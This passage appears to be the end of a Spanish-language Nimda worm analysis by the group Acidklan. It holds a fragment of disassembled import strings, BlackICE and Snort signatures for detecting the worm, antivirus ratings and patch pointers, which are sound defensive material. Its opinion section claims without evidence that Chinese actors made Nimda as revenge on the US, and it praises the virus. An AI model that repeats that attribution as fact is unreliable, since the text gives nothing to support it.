aLoadlibrarya db 'LoadLibraryA',0 3617880D db 0 ; 3617880E db 5Dh ; ] 3617880F db 1 ; 36178810 aGetsystemtime db 'GetSystemTime',0 3617881E db 7Dh ; } 3617881F db 0 ; 36178820 aExitprocess db 'ExitProcess',0 3617882C db 9Dh ; ¥ 3617882D db 1 ; 3617882E aHeapdestroy_0 db 'HeapDestroy',0 3617883A db 1Ah ; 3617883B db 1 ; 3617883C aGetlasterror db 'GetLastError',0 36178849 db 0 ; 3617884A db 9Bh ; ####################TERMINA################### [PROFILAXIS Y ERRADICACION] 1.-[REGLAS PARA FIREWALLS] +BLACKICE Excerpt from a mail by <robert_david_graham@yahoo.com>: Here are some BlackICE rules you might want to play with. The first two look within MIME headers for filenames of "readme.exe" and "readme.eml". The third looks for any file creation attempt of "RICHED20.DLL". mimefilename.2014101 = readme.exe issue.2014101.name = Nimda Readme.exe issue.2014101.severity = 4 mimefilename.2014102 = readme.eml issue.2014102.name = Nimda Readme.eml issue.2014102.severity = 4 smb.filename.2002710 = */riched20.dll issue.2002710.name = SMB Nimda RICHED20.DLL issue.2002710.severity = 4 (Enter these as configuration parameters in ICEcap or add them locally to blackice.ini). Note that even without these rules, you'll still catch most of what the worm does over HTTP, SMB, and surprisingly TFTP +SNORT alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Nimda worm attempt"; uricontent:"readme.eml"; flags:A+;) alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"Nimda worm attempt"; content:"|2e6f70656e2822726561646d652e652e656d6c|"; flags:A+;) alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"Nimda worm attempt"; content:"|6e616d653d22726561646d652e65786522|"; flags:A+;) alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"Nimda worm attempt"; content:"|6e616d653d22726561646d652e65786522|"; flags:A+;) alert tcp any any -> any 139,445 (msg:"SMB Nimda RICHED20.DLL";content: "R|00|I|00|C|00|H|00|E|00|D|00|2|00|0"; flags:A+;) 2.- ERRADICACION MEDIANTE ANTIVIRUS Bajar ultimas actualizaciones de dat files SYMANTEC: SI, POCO CONFIABLE PANDA: NO CONFIABLE AVP:SI CONFIABLE PC-CILLIN: SI 3.-Parches para MICROSOFT WINDOWS NT Y MICROSOFT WINDOWS 2000 http://www.microsoft.com/technet/security/bulletin/ [OPINION PERSONAL] Nimda..... Una venganza de la gente de la republica popular de china en contra de el gobierno estadounidense... Como vemos a estados unidos le llueve sobre mojado... Primero REDCODE, despues BLUECODE, ahora nimda hace estragos en maquinas estadounidenses... y de todo el mundo. Nimda un excelente virus desarrollado una vez mas para probar vulnerabilidades en las plataformas win 9.x 2000 y NT, anque se reportaron tambien errores en maquinas apache, colapsando el httpd.... CUIDADO SIRCAM ESTA CASI EXTINTO pero Nimda tiene un gran camino que recordar [AGRADECIMIENTOS] Anthrax: Escribio este articulo LocoMX: Me paso el virus, asi como varios analisis de maquinas infectadas Crond: Elaboro un analisis de maquinas infectadas asi como la infeccion de una LAN, para provar lo que nimda puede hacer. Java: Busco informacion, asi como me paso los strings primarios de el virus. [DESPEDIDA] Una vez mas acidklan elabora un analisis de un virus que causa grandes conflictos. Espero sea de su agrado. |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |DEDICADO A LA MEMORIA DE LAS PERSONAS QUE PERDIERON LA VIDA EN LOS DESASTRES| |OCURRIDOS EN ESTADOS UNIDOS. ENVIAMOS SALUDOS, ASI COMO NUESTRO MAS SENTIDO | |PESAME PARA LAS FAMILIAS DE LOS COMPATRIOTAS QUE MURIERON EN ELLOS. | | MEXICO EN CONTRA DE EL TERRORISMO DE CUALQUIER ESPECIE | | | |Nota: No estamos a contra ni a favor de nadie... Solo que si estamos a favor| | de la vida. ACIDKLAN MEXICO| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| Dudas sugerencias: anthrax@acidklan.org, java@acidklan.org webmaster@acidklan.org locomx@acidklan.org ACIDKLAN DEVELOPMENT AND INVESTIGATION TEAM.